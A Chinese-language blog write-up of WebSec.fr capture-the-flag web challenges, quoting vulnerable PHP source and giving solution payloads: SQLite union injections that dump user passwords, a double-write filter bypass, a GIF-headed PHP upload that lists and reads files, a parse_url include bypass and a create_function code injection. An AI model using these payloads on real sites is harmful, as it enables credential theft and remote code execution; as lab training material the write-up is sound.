WEBSEC.FR

国外的一个平台。看到队里师傅之前说有很多骚套路,正好BUU的题不会了,来做一下

babysteps

Level01

sqlite注入。

1 order by 2 
#字段数为2 
-1 union select 1,2 
#1,2字段可回显 
-1 union select 1,name from sqlite_master WHERE type='table' 
#得到表名users 
-1 union select 1,sql from sqlite_master WHERE type='table' 
#得到表结构CREATE TABLE users(id int(7), username varchar(255), password varchar(255)) 
-1 union select 1,password from users where id=1 
#得到Flag

Level04

给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php 
include 'connect.php'; 
$sql = new SQL(); 
$sql->connect();
$sql->query = 'SELECT username FROM users WHERE id=';
 
if (isset ($_COOKIE['leet_hax0r'])) {
    $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
    try {
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        echo $e;
    }
} else {
    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
    setcookie ('leet_hax0r', $cookie, time () + (86400 * 30));
}
 
if (isset ($_REQUEST['id']) && is_numeric ($_REQUEST['id'])) {
    try {
        $sql->query .= $_REQUEST['id'];
    } catch(Exception $e) {
        echo ' Invalid query';
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php 
class SQL { 
    public $query = ''; 
    public $conn; 
    public function __construct() { 
    } 
    public function connect() {
        $this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
    }
 
    public function SQL_query($query) {
        $this->query = $query;
    }
 
    public function execute() {
        return $this->conn->query ($this->query);
    }
 
    public function __destruct() {
        if (!isset ($this->conn)) {
            $this->connect ();
        }
 
        $ret = $this->execute ();
        if (false !== $ret) {    
            while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
                echo '';
            }
        }
    }
}

审计后发现先过了一个cookie中的反序列化

然后进sql类。

构造一下就好了

替换cookie得到flag


Level17

数组一把梭

strcasecmp()函数遇到数组返回0,符合条件


Level25

1
2
3
4
5
6
7
<?php 
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query); 
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}
include $_GET['page'] . '.txt';

问题在parse_url函数了,如果他访问一个不存在的地址就会返回false

payload:page=flag&:80

或者使用

http://websec.fr///level25/index.php?page=flag


Level28

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php 
if(isset($_POST['submit'])) { 
    if ($_FILES['flag_file']['size'] > 4096) {
    die('Your file is too heavy.');
  }
  $filename = md5($_SERVER['REMOTE_ADDR']) . '.php';
 
  $fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
  $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
  @fclose($fp);
 
    file_put_contents($filename, $flagfilecontent);
  if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
    include($filename);  // it contains the `$flag` variable
    } else {
        $flag = "Nope, $filename is not the right file, sorry.";
        sleep(1);  // Deter bruteforce
    }
 
  unlink($filename);
}

一个条件竞争的题
没复现成功

easy

Level02

和level01一样,只不过过滤了一些东西unionorderselectfromgroupby.双写就行

-1 uniunionon seselectlect 1,password frfromom users where id=1


Level08

文件包含,会检测gif头

GIF89a
<?php var_dump(scandir('./')); ?>

发现了flag.txt

读一下就行

GIF89a
<?php var_dump(file_get_contents('flag.txt')); ?>

Level10

给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php      
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
    $file = $_REQUEST['f'];
    $request = $_REQUEST['hash'];
    $hash = substr (md5 ($flag . $file . $flag), 0, 8);
    echo '';
    if ($request == $hash) {
        show_source ($file);
    } else {
        echo 'Permission denied!';
    }
     echo '';
}

发现会截取md5($flag.$file.$flag)的前八位,如果比较正确就输出文件

然后就有点没思路了,flag未知,爆破不太合理。。

看一眼WP吧!

好像是个弱类型的题

暂时还没复现出来


Level11

暂时不会。。


Level15

create_function函数漏洞

之前写过了 不细说了

;}echo($flag);//

发表评论

邮箱地址不会被公开。 必填项已用*标注